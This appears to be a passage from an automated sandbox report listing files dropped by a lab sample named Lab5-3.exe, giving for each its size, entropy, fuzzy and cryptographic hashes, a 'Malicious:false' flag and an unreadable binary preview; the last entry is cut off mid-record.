                                                                                                          Preview:.saPZ.4..<U..`x..!n........E.......w........8.\.6I.A..GH......%D:.u.*...`..TG.......D{..d...R.Cv..V..%=.......+'...Q......g7o.e..s+OI...H..o{A...fb..=.c..)..n...)m.>.n.o....".^Z.g..R......E.2......].>...Q.l..v/..N2........$.~ ...l...Y&...u...H..4..\... U..s...J1..z.TH...e...lo&(...I.....V-......m7.XT.s.q.1."..G..BD.c.s...*.iO.|W.......^X0S...D`..K(+.....qB...T..2.UJQ.+5....6..#..ejR.$3.M.6.....;].:G....[......tt...'!.T..f.@...1>A.'1....|(..w...52.o.%......0..y..K.9.u..,.f...]...t....S.iH%...$.r..j....|..A.9Y...w....~AtMr.g..s..6.y..5V.._'Ao....7..../+..^.z..dA...f..t..P5.S.0..L. .g./......Y.........}Z.C......m"(...:..........B.......K.C.".z\)(n#.q....qK.Z.2.zV.....'}..W.....GpV.!-2.-7}...V....>9.(.../....)?I..1..3..K...asJ."....x.a....Y4..Z..x..Ct....d.F.B6.We&%.S[.I..Q..A...-.....JN..O...G.6..a_.....;...j..e..K.....R..]..V....p|K..).!...n.......f9.[.b....j....BA._c....#.(...XDO6..c.w..._.G....=X./.....=.-..N&.[X...$...]w .N.:....p>.q.4.....Q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.933673788571262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MkbLiPTxVGuUQbAaZowc7J2oCibf3u/y0cHfUTid3hBaUoSGFcmeykEdEElU92i:z/IjGuU2Aoox2oObbGx0uKeY2ElUJ
                                                                                                          MD5:32ED5EBD9423F98E6336AC349EA36CFA
                                                                                                          SHA1:DEEF12051D4750DDEC5CE48CE60610C707867418
                                                                                                          SHA-256:A613B088E1B70C10D1FF0F93F193033503800B2A8F5AEE4CE75F681D9BF6D00D
                                                                                                          SHA-512:1F93E10EA1728468A562CB884812828A72BD4A96B10E3AB157F8C7171DB1799BFDE3476DB6CCEF28BEDBEE0838271EEAAC570A36BDC4EA87745B0511800A30EE
                                                                                                          Malicious:false
                                                                                                          Preview:.....f..q.....k..}.....!.nF.....j.\..T<;.....r.nb?....ym.[G.B..Cs.il....E....[s..GA.O...........!\.)D..l......]....U..p=.W2....%...(..(...,....<,..^.x.S/9^...mI...n>$l...YE.I-#".5'..~%...*........B.c..JU...-....'..F.}.8.m....7..H....".>..T.).`.4\..l.0..9..S......].+...dH..(D\zR...:..9..~.s3.\.|a,q...X@.Q..%.%^..O|...sh.d..B=... .C...-.<.......-<..1......".l.O...T...........\R.&(...oG....soa.^...]X.......-...TK.>..[.b.....i..<.....k3......(%.....vDo......$e;.#.N..e.54....=.ZQ.c9.K.|L.4p#..#...'...A`.@.....@{P..F.Y!.hBa.....z.....4W..<0.Jo..^c....-...'..]..<T...h..i..L.8D.r.@..a.B......V..}.M.....7.._76x..a_...4`r_..ZR...d..I30.+.cz%H.>......b...g..k.;..;..+i!y.5.b,6%...\......{.I..h....b..a........1...Tu.:T..RM....b.Yi..p(*....R...W[Sj.M+.".S..4.%s.+....Z.oi.@1lG.G..w.k`...xK...9....I.E...c...A..@E.K.(.G3.m......;.!....d.\$=H.L....D........q...Y.3,.H..Q.....#bl#..C....u..t.@RP..F.....Q..Y..a.........a....#..N.V..}....|p.g^.M-...y....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.9179565350421095
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FxB9NBIo3lepzufy8RPHfUTid3hBaUoSGFcmeykEdEElU92i:Fx7NBIo3lepufPRUGx0uKeY2ElUJ
                                                                                                          MD5:63A9AFF194DDA0725A6A07DCCA871ACF
                                                                                                          SHA1:A3BBFE86F82E4425BCB189C4DA817ECDE946AC57
                                                                                                          SHA-256:1EE966EE4C88285B88113C3A4A3503B091F7C1BE439F4571129CEE2A790A30AC
                                                                                                          SHA-512:C0613244EE1A739A190B5D6E7149DCCECE20D525FE751B58093E4CFEDAB7470369A9E356E149CE93DD981D40154C34DCE042A6605FF30BA904FF71DE03C17474
                                                                                                          Malicious:false
                                                                                                          Preview:0..V-H..:%G...L2..RG..H....]H..}.o.*._...<....nL.<Q..K........ka.Ic9...".>...|./...7........t.4....?..F..G....@...(j..A...H1....../.vbHxg...L.O..l...~...s*[..s...f.'...v.Hv.i..D.i.L.W.'3.5..=....<*.k..X..*x........).r..p.....d......T..4U-.{.....W=.v.U.Qp.u..:....U...1...6F..|.%m=..J>.H.$...K].......Sy.B..!...g...xe6.;....]2.W..j6....|....f.!,.Br...b..2.... .....d.n.....!.....n.i..!....qM-@...< .:$O.d..+..0.../;.._J..'.@...h..1..l.3I..Q..f..y!....[1k.-+K...+W..1.{.Az.N.x.5-.c..`..$@.K.+uE...{.H..q.F#1K.*..c....O.....,..H_w.....N.0...b...~X....Z@x.F..b-j[w.|...Gz......{u..:......j.*....4....<.0("c..U....-M...6.\.......H.I.'N.n..xSp.......yg7.nD`...q.M...=..k.1[..1.G=.@...:..=.r.#.....E..0.eZ-;..j.RcN..V.mP.>n.Y.J.a_a......z....f....).'.V.0.?..:.k;}e.?S.N....*(M...j.qQ.q.#...x.:...3.....KuT@.c...,....5.Ui%.)..NaMf|I....!>_p\. ...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.909821378919648
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:weeG5bIIyve29sGABACHfUTid3hBaUoSGFcmeykEdEElU92i:Br5bIfli74Gx0uKeY2ElUJ
                                                                                                          MD5:B25AB7C42BBB4D4120AB897387104E85
                                                                                                          SHA1:372DC7B05B29351AA98BF9044940990B7D8C3542
                                                                                                          SHA-256:78ACE01FB8E191F24E880B3E2BD843D87715CF39360650F93771979303657063
                                                                                                          SHA-512:5A1ED5A38929E520BE658B8CAFB24E60525A3C89830121F8DF03CDEE410A0543752CEFF98B2487864A4EFC162D689542FF80CF90665479B442261F1FDE13CF7B
                                                                                                          Malicious:false
                                                                                                          Preview:....6~.a.BU....(:'!sn..........g..W.....:.f.V~.t.;..L....m..1..;....Vwbo..Y.K.^WP..~..^J={.F.K...<.t_.>...l..~.ci......C;U|>.0,kH\.L_._..@f/.,'...BDd..)=._..+U8.U..m..6o^.........@/./g...aR.W.G...M....v.)N..'..o.o..M..+.<\K.a....?.%.),.D.Y.OU...D.tf..&.}.5;.]...).C!7.M$w.I%...R..Cu.Q.+.0.?....7..k..........f.@.o...XH.Qym..........x...{.....Q...@I........u..P..j.../}jqG!......cC...7..1.c.e.'.(..0A.;.a'..lC.....SoT{{...g...|....FOx......a.<.....W.....0.m..ZZ.P..n......G.S.[7.u....].B......`....$Cf......F.3B..;.T]..K#/}.O{.^...&n..2...k....,.C.......q.X.&....w.3........Z.,..2.8.JC5/.......H......wb...U....}J~7G.....q..l....'h....)a.'yF..h.=@.%[.qi=.8b.............7..u..C.....\.;.*...K$.*,...f.3...\..soR.E.*`."D....Y...A..D.....pX~9+.YBe|....V....Pv/.......h..7T.5.R1....:A.r.#..>.........7.L...v...#v..v%..PI.G..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.918236929417432
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:asGQLG0Q1eSow0uwp+0GHfUTid3hBaUoSGFcmeykEdEElU92i:Hy7eSoyYhGx0uKeY2ElUJ
                                                                                                          MD5:75475723458BA09F4088B5AFB91A8C20
                                                                                                          SHA1:0A68496ED3E72DB718AFB39121E8A9890AE4CFB8
                                                                                                          SHA-256:8FB11A53808593EA0DF4507CCE363E6BB14186C21A3B07A4A3FA8656DD7E23E0
                                                                                                          SHA-512:50B571AF0E0A420F1C2230F74C3CAA5A87DAE9ED8968B57EB62109F03026A289B7A6F1ECBB182BC5B44D0AA2D4987DA04BF692999B81F19BC28FF7A855057C00
                                                                                                          Malicious:false
                                                                                                          Preview:!..=.........j.G...@....}j......P!....[.=..ud.87.. .....TK.U...e.J/...*....C...gg."..@I"T..o.......6]J.n.RL'.TI .#.k..X.........b..|`.U...9]..P......F..1...Z.I`..M"..;`ON..-..g......gF....A.../..&...=..r..>c./....jrs.p..m:...<-.'.....xL..X.........q\...U.....i.q.....AHy;}.e&..+x....GcE..$...rc...3.8v(.....p..g.Psr.`:.4....(q|..q.`.~.B..F{q....R......cY.a....n..v&..1.`.A...X.`......!..v.<...|.0M~.-.....`N.S..v.&.,.4....w....gi.L..z+L.wO..=qg.s..U\.Z..&>.o.g..............Q....k....m.&.%.U....^.n..}........d...ED............y\:..,.J.B..l*.%.0C..|..b1^.$A.Y-`.7....$.x..+.FC..|...B.p"....@.............R..........R....;M?...Z....B.h.*.[......r..d:.3..G...N.QgU......l.J.9M..[B>`..\(X.....G;........|.(.).}.h..@.U......D:....@.....]q..(..t>QK.._%[.3.819....*..J.,.^.l@...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.922989307190385
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qkQsVjzhh9dfg1pnRjOwHfUTid3hBaUoSGFcmeykEdEElU92i:qkQij9hvg3nRjCGx0uKeY2ElUJ
                                                                                                          MD5:79B1EF8D978FB1A45AD0E2104B82790C
                                                                                                          SHA1:D987CF16F6BD9873C27C106C090368927C6F3A99
                                                                                                          SHA-256:1749EB16355FCADE71B0DDF1518215F8A346D29AD41CD0DDC7C1460DF15E5B72
                                                                                                          SHA-512:0169D8C8F1A53DA46724FF0A0758DB8216E8D9447CC65630DA86F700F4A6381020D7B4BBF34779E9C9090B51C4897EE0F90B1C6E500B995C356510A1371C079B
                                                                                                          Malicious:false
                                                                                                          Preview:s.].r.h...wpLz....:...].)..=.....YS..x..P....a.Z.p7A^.0.2...-....0...K..f.~di..IVn..$G\....)...\..@..jA....5-.....H.v4]^.@....{........+.)k.Be..9..f.[.....j.ob>..q.Q.....*}..#.u..G.....i/...{w<...o..X..n.SM..G...._.c...@5,E.c..&...e.|..1w....`s....r:@...........e.#.c.EQ.?.vv>Vj...C3..'......0.y..^...wd.l.....Xe..r6.$zg.........D.|O@.V7.d.....I.}....X..tJ........w...<cUk.V%.k"..f....4AZ....+}$.q.....}..k.5C.;R.%w^........C..TD."v...H....e...$^....y.".]..1.=F.b...W....T...{...O.kR.(r..U(".^.0{...]......DV.C/....1...q.s%.U.1......N.G....z...2NakS>E..N..h..^.X.!C...l..d.zm...X...IJ*.V>%[..'.._c.d.Ot..-..i..0....,...j4....t.Z,Gb..TI.....j.rn..d.~.X\.`...3.*l......|..N<I.)z.0y:.....m.9...g.U...R..;C..P....{m'...$K.Q..D.p,..... O...6Q*..D.b....=G=]e.5..9QA...L.......C..'...\.NcgO...e)V9k.^..w....."..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.914281317825796
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zUX3cJrroVJ9w/xBxhOHfUTid3hBaUoSGFcmeykEdEElU92i:OIrryIxBxhhGx0uKeY2ElUJ
                                                                                                          MD5:0793E03F3E3C6A1C81E8D8A3668737F9
                                                                                                          SHA1:94B7576E219AAA0314C4FC567929121D6103DAD7
                                                                                                          SHA-256:207ABE6B4065C1BA90F8F9044E88BD736DA4210EF0E25AD146A742BA09149CE5
                                                                                                          SHA-512:5B57AFFF66891AAD97E6113F1233BC71BFE40CA3154B50664CFF9F3240CCD9E391D7266B5D6C27E5C97AC53E3EB335BCA96AAD32E80E9904037F312EA0C3C08F
                                                                                                          Malicious:false
                                                                                                          Preview:....^..o...e.0T..v......9...R#...O........F$;[.x.c.4.'....Pn..j.z.J(X..0..+.Tx..o^....A(...-.-H=T.\H.`....7W.z...u5.......?.j.g...........&........Ou.4...~N...J.y..f...G.9..NO....^x....?.]..'F...L.,M>.....g....M0...zg..y..IK.w....q..\.H.\...)Cp..ga=..k.c.Lf..r.%..0..>....~.`..8a.;...G~...^.?...)......=.~....2..r....QD...+/......[f...[xy2dOG...sv.+K.5..^.}.fx(.i....&.+0lm.[..y|..2.O...t....|..Y..\..6.]I1..h.;)..[......|...jgz.?uZP...#....7.5.q...*...\}r.....S0.........RA.o.....d.>6-...d.(..T..@....1....+Mu-..}...FF1..Aa.....D.D....k...P...T.......H.....$F.}..[IL;.v. ...ooA...9.SKz.S..I......d.0.z..B.q./...u.k%...~.l.CkrS..2.H....O[...%..+M..=Z..."..k'.F9....68......I.H........X.....A..u=i-.............eIN.O..*.0v.a[7.s.9..~.....Pw.&.%..t... .QBR..aIp.}.2........D......W(.s...BI..IS.w6t.w.....k~.*l........5!L.'C.^ 7.].."...JC.a...uY9.p2p....p.>..{........!../..YB=o4.....\.u:.^......1........D...L ..e.`E...h.S3z.-{._`...?.n"e..|.A........N8..>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2032
                                                                                                          Entropy (8bit):7.900818581487377
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:J0sEycO7iF7m1qkv/PHfUTid3hBaUoSGFcmeykEdEElU92i:JYyeF7sfvsGx0uKeY2ElUJ
                                                                                                          MD5:18FF7D138A81468F25C9DEAC12EA629F
                                                                                                          SHA1:D9D23309BAC3107E19DAF94582179B9DEFB0F44F
                                                                                                          SHA-256:B6A81815160FA54CF0B94D53809C56803D083A1B07C2BD92CE53D74AC7F4C027
                                                                                                          SHA-512:8C3F107D2E110A8FE27000C260636165AE0439D53C2FE508148601A93660516562D2D4CC302AB07F7F703794686FBA3C113BC6E3DF32647DE3FF403A81F5C8FF
                                                                                                          Malicious:false
                                                                                                          Preview:.C...:r..D.m#c...&.p..'..y..SF^..XJ.j.....LG.v.o...}xd.....g%..lgte..7.>.O^S.gS~.2......U.DM..V".#....D.....=o.=....]............aN[F).. )u.4..e....L.H..0..k.Qz...L..?..oL.ek.>.....V..A.a.=^..<w.aN...z.xs..._..E.Jo........Y..ll...)..m>"......m'....iA.oV....<l.*...(..t9.w5.Y....p..BP...+......A9(.;.........:S+fM....!!..|......<.......3?...*oT2u...Fj.....W.P+=.D.r...u.k..i..H..k..P.....;d...j1I".o.$.k".B.lt....N.mY.N.....p....\.......A.Zw.z0....G...q.}....2.%S8O...%..M.%5.O.t...}Q.c.....l......1.n....&.1...b...z./...n.I...`.T....#.........A.Z)..e..'~..k..^h........+3....5..e.5.m..V...N.....Y....O.S..{+....L...M'..b.0].f.P.\...{...S....<]&..bXLz..g..J.B.l.L0B..:G<e.e.d..Ik..~.+%dgN....k_..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.938335269339571
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KcUKENWfqmcfx6iML31J1mLqAMKgQt4KJiuocScHfUTid3hBaUoSGFcmeykEdEE+:K97WfKfZMLb4O59uUuoDGx0uKeY2ElUJ
                                                                                                          MD5:8BFD1A5CA9BFB481A7462AECB0FEE1A4
                                                                                                          SHA1:055A50C7D0F065182BE8C0BDA4A24CE71B54EA17
                                                                                                          SHA-256:B9726BC2AD21640489604F2497FF7F0DAB9BA76EFE4A8D73115F1CF906D03494
                                                                                                          SHA-512:F9616BBA84FC2E917FC4DC7515BB2650A97008B6299D5D810FA8015B0A3381DE6472C1F46B67AFA1A27AFCB6C368D2D0698A1D37823D190CA5D61051726E771A
                                                                                                          Malicious:false
                                                                                                          Preview:..q...w7.Z.fz.?1.........HY...._]...og\...!...0WRT2......*...9h.l.....M.pg..KQ..R~H.>.....$.0...........D.p.............N"O......Ut..=./.g...u...r..F.X...&.*.)..@M?.;}.DeW...~..._.e..{s.%.ML%.R.^..K.L..2.L;.."...Ls.e0V'..C(...9n...|:..2........:....f.s.j.a.E......w.qL.....{.*(.9..e.Bl.N.PZ..B..I..`..}..|......k......D3)\.V\..ub............`......+.g....W.^.N..'B|....N.^.{..M..;61....~q..x._..l>;1P.h.f.X..5.H.;.?#..}..j.....^%.j\....W5;.U..C..w.........h.X..*J}.Y.|F...>3.74...J.bjPA.......m=..N...W>=.T..$.Cg.6.3i....@.6...@2-.z"...E..8.._.w.t".wdhbs...7!...5!...+..*Xt..Z1...M.}.H..5...*p..cQ-..3.2,R......f..]...fT....%......2.......s...l.NrD....H8C....H-DJi;Oa.I.5.9..n.1..P.K5...]g....4.."a...(......c..^.....G.f....QP5.....kO.$\......N.Vx....W.S...A..a&xF....;B.....As...V^s..>.`~.4C...6@.._.>..C..y.n.Zz..o....S.N}R...g...~dam...O.(6.R..*.b....a.._&...i.)...y.K.5.p.`...*.u.Ed...K"9;.;}.>..Lf..O....N....2....Gn.......QVb...Gx.....{.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.938188227254816
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vUSTRO5EGNa4ah4ykNROIx6Q5eIsEO/8UgBHfUTid3hBaUoSGFcmeykEdEElU92i:nfGNlaedH5eI4/8eGx0uKeY2ElUJ
                                                                                                          MD5:532E8C9565799E4EF6056B0DD0E5893B
                                                                                                          SHA1:95A630395612DEA07AC74A78D95671DDECAEE5C2
                                                                                                          SHA-256:9B18C417A05312F8E244B763523ACFF6C8306170739C5AB113350DEF730CF504
                                                                                                          SHA-512:938EA7029ACA1B2E9119D9F463B00FCB8BCEE812AA2922A7AFF1A2A68BAF7C724BFB88E39D31CDF4888374D84649645193A1592353FBE7733D04B7999BBBEBFD
                                                                                                          Malicious:false
                                                                                                          Preview:HP.:...e..8..T -......N.T.#A..Ed..v.|.c.RX.h...`oC4..1A.........KJ.I.w..2....'...k_.p...U.C.Q.B..........'...@.2.`.zts..`.k,.x....nS..0...~......f..U_....(.."..]`Ht../..;}..}^..Z..6...I.ey..7..).%.......1U..........zhH..Q......8.R.../..,.j ..|V..Qg~.Ni4=.%. H.....L@O...{.......>fpy...l..$.K<.D.....:..n...kbNyO'Fhd.N..p..A.....+.....r.s....KV,"..f.....R'.......9hSW..u..g!.~..>.O..E...t.... .^.t.C.m4...........Aa_...nnq........k1.|.j.LR{.}"h./W.Z:. J.....2..'..V.W.j.m..J|V..~.p.e.0.Rv..c.y.?..=...-$@............}Y.v.A_...b.w.<..2a.uT.&&<xY..%.K.u5.&.j......1.w`2..T....X....t.V=.{(Q.{..t.^^X......x Y..q~..m9r]..u....It.....1....M^ "..7...<../|.r...HS..N..UFl]o.0:Pm....Z.[.....,A....Z......C.&.T..RD,gF.N....[.u#`..ueV.b.2.i.........I6.a....[r.`$....,.).....O.<rl..0......x....\.@."a[.....2...yJ......>.O..M..~....../..TD..|.edcnO.....s....[....R...<d.>..P..R.D...P......."`..W~.~0......e&..l.U.=..@.=?.H.Fe.........r89...,...yI..[...{..k..6.P.-.5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.931244282231852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YXVF36f990N479lWQ5lx7hXIMnZHnAtnHfUTid3hBaUoSGFcmeykEdEElU92i:YXwoNkf55JvHnfGx0uKeY2ElUJ
                                                                                                          MD5:5BD0CE0CE90EFB6C55FEC886C7C66EE6
                                                                                                          SHA1:97376B05EB886D9A022F0244226C9D08D526ADDA
                                                                                                          SHA-256:855F0D945D1C1E1C7AD15BBCBDDDFAF734F10F64964E0E08446FE1E2ED716BD2
                                                                                                          SHA-512:C8BADFE8396989DC78D163DB17199314C2E4AE3310431CC24A570ED1B845B3E9F2A4E5EA5B32D59F5EE812D380253529E502A368D79F92F9782EC3ADBC521AE6
                                                                                                          Malicious:false
                                                                                                          Preview:o.tT...K..i.Fzs1<...PZ......{t..#...N=D...q.o.m.O6.......#.V.*.D..H..4.,.4.7.;..L.\iYfCY.Y..O..].S. .....2.r.C#....7..v.58...,.v.U.B.....~.o.T......`H..9...5...O..+*|...=.iP..j...0.)._...4.==.>">lk4..}.1..%oCb#..h]0...H..A.@.bZ.j..\....B..G...L.*...e.....$i...l..$ZHCt...}T.{.G..O...E..7.[..>..'...>I....|%.+.Y#/rP.\.....]..`#.."...X.jV.^......C... ....9..0.\.q....T..K.....:....t..".D.B.L..L.eZN..h(.S..\kd,C~.H.0..t...+?...E}...6...l..;..O..i...).......#C..).'..QRX-Vf.q......0....kK...Z.+.\.Tl..0...E..j '.C...=q.r.{.....5..../(..in%....s.....U..H9..H.&.l.........v.5.?&0u.I.No....i..4|9..M.a..k..2.L.ll.c..E...>s...d.)IT.r......_8.*....%.....B..........h>./....c5@..1....q.G....>.w.Is[...7_...Z...+.1..y<(.U.I..._..!Wc.#.d..48.'.*v..R^..;d....=.~./....S....../K...M..m~t\.....J.......u.....wa.\..k?.X.(.......'.0.....1.k..:....~.......w.r..{f............)..<.X<PbX...=|J..7..it..........p.>&B.y.U,.w{@..a.>d/.....ejB@.\^4....f........O.Q...N....Io.W..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.92948920415493
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:p5zRm/tQjYlYkrd+8lZa2Q50kRyPovsMCuHfUTid3hBaUoSGFcmeykEdEElU92i:U/t+Y+Y+8m2Q50kTfqGx0uKeY2ElUJ
                                                                                                          MD5:EE4D0FF9EA38F8249EDCF054F3FFA8D7
                                                                                                          SHA1:D37FF28DD713160AC123656F9ACC5ED91A37C4E6
                                                                                                          SHA-256:691B193CD03947BD73E379E067DF7626B276A81B7E594ACE9A4E4528E33ECCC4
                                                                                                          SHA-512:10F01A09EEF399172D61A9595FFF0E285FAF9F6E566CCF8658AFE289049682A2608BF30970C8E59E07E8E2B0FD218AC8AA5CCF8FF4C354A396A364B739B63610
                                                                                                          Malicious:false
                                                                                                          Preview:.*...\2.c....'...1.l..}..l.]...r.Q~.....m.3....?(.m..{..........X.W.=8..lC.&+.rPAm~d..m.O.......1m...z.M..o.0...'.A:...f..{c{...e.u5{#......5*w..* %.r8.(.-..$}%w.@R.{#..Ks. .}n.....ygW....0....j......tL|P#Z...S.....l.....S.'.......|.-+0|\.7Q.2.......0.crI.....Z.....P..n......{.C....G. ......d..S7$..p.8... 1.....Uy.[....[.Z].p..~..;.&."..&.<.Sc&....[1.c.....;l...}j.b..@.....V%...0s....^...8....8..d\.....lqs...f1.$...cR....n.#....a'......VhP.@.....y.~.|.O..'....Y..6.""../...&8qe.....F.f.\d.?....T.7.h.`{.H..t.I.#.k..nv.5rTe......1F..m.V.D....e..x..H....l...z4.t.. .t.5...s.?o2y...$0..nM...k.`.m...Z,......:4.'b...F.y1..G.'.X}....,..?..F...mza.........Q..d.ckP..j.....T.VB.P..9..f...,t.B...*.Vo..s..A1..........X..@.....$.("..1aMN....`...7..)9...o.....Pt..F..b.K....{G.0..7b/..rH....L......Q....@.H.D..A3.m..]e../.....k..)#./......STx..-VpQ......3.........H..la..1.$.I...n.B),.o.4...P:.oP.Z..e...y..C......s...*T...)....O.f..v.|...W6..+..H./....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.936623922781266
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:AamlHoURaWeIs16wjTRX0B1U2BzLHQ5GhDLEkkprKJ1gAtqeBJn+HfUTid3hBaUb:Aamrve/jTNv2BzLKILEHrW1gAPBJRGxZ
                                                                                                          MD5:FF3E656AFC1CECAFD57EBD2D87827344
                                                                                                          SHA1:1DC4FA1E85D304920368E4C2F10F4E73482E640F
                                                                                                          SHA-256:6A01D851C419A21C07368C610534FF0AEA0980E083DA2C25959F63E09C64BBA8
                                                                                                          SHA-512:D4BC118E09FA8C8673C5F3FE9D0502DFFE2B12762FCCD2E3575F9947A66AF4474320C27AC7760A1DA3251B116E13003957FC88F9C22B2FA5EA7DA1FA4163C86D
                                                                                                          Malicious:false
                                                                                                          Preview:..E^!.O.'fk.Y.o..:.b.F.k.aXh..e2..A....g...J~?.?.T....~0K$.W...p...[U.b..S.c.Hf..ZKB*.I.X.!......o.........Ss.m.&.;(..p.u.r....X|{.+..F....r.J_.P1...P.(.&.6.....%).~..=..\.8`0..*v.~..M.. .4..;.SS....n. ..'6....?..!...5...B#$}G.q....<....F."{...{s.5...q.2%.\..k...].eJ...K%.Q..wP.4.P.._R&0..C..3O...LL.....;w"..R...qc.lj.|....[nM.t.c....*..........jJ...5<g..M ..;....W.,hMqK.w+.....{...f'.h_.....~....$..;..9.O.....{~..l......Q......x0l0Z............]<y.h.u,.<_..[..v..7.....K......J..1..K........h......H.K..Z=..'..ZL.Xf..5.....%B 4...,H....(."g}.D....d' ..1NyHI..E{.y0'..py.....).{.,.n..BA..S..o.*?I'.A./V...r.."....n..Y.N(..u.i....!....g.....2..r.......Pu....6L....{;..7.L}..2;.......C....U...O...2..J.y1.*....Y.L...SGT.....z....G..h....:EJ.....VE.|.....p06c3f...k..m.. ...T..........~.w..c.......&.0z.O.i.C..;W.Zn.:....o_....A...*..@.K...(.*.9S.jy-.9.R....x.L..h.<B]..U..b...hg..<..I.d.............Xi......../h.z3..6.'.o,..0.Op..Z.........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.918884555005609
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pDSZ5V24pVuFxJBBKHfUTid3hBaUoSGFcmeykEdEElU92i:pGZ5Y4pVC5Gx0uKeY2ElUJ
                                                                                                          MD5:CA7DDF56D6427C2FFDAA9999E93DDEBB
                                                                                                          SHA1:3BFB01803BE91B5154E13EA5365A38DC172CC499
                                                                                                          SHA-256:C39AFBF7C8F9846D790211C0B73CC982306C2D42D94976D3E73598CECB56C0F8
                                                                                                          SHA-512:D45DE17A36F6427CD96EBA22F22F0052C7E7DCFA2F25DFCB4511024416C718C91B7FD3922AC96957751C10591EE5695A38C9EDC637E353895F4FA4D9E9FCEBF0
                                                                                                          Malicious:false
                                                                                                          Preview:.4.L.....wo.1.."HLRm..z...[.f..o.v9.Sz.g.,...1..*.i,A..&.q..t.....'..q.U...PkT>.....D...t..q6...5..p..9..WX..%.R.k>[...)A...L..N`.....+{..y.'...{.9....RCd.j/.......*"......=.....v.)$.q....q....h....w..............B.v..}...4<b.jC..x.....|v..cw=.L.Tu....N...r..O.-.e.%.^ .N@..p......>x..oy...".UHA.B.Fx........q.F..7.\...w...I.4.hl....w.%|..Z..xs.....g..&..SM.iQ...6&...v...o.9....<.<.......I..|.4c.%.n$(.....O..u..Y.}.].m...ci.B^7...KtW...l.:($.6..0.......GE.3[.]-6G|...Y>..=.......)3.&8...V.4b.7..H.......h"..v..{.X:#..z.......iF..Tq9..........F.hW......)......O...;.4n........z.l).8....y.p.0{.m.~...|`..r..g.0+..jA.e..%......).......NNFQs.^.Y.z..A..#....".aJP.OQ....m......=..Y].....e....<`....-..$.*zmOvk_.XAeUb...H.v..,....~T.B.......z._.E.L'..!1.2C.c.|..5...6y.o;..pm(..*...GF.%...0d.G..z..(Q.C.4.s;.l.........g....dEA=.z..<6..0..}g.j..b|9 6;..._LN]SC.G.I...6d....`Y.ZY'W......!WC.P....H.oY.....f.S....0%Q7....R..F(Pc.x.P..n.<;e....tl.u.....|w..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.916096281412959
                                                                                                          Encrypted:false
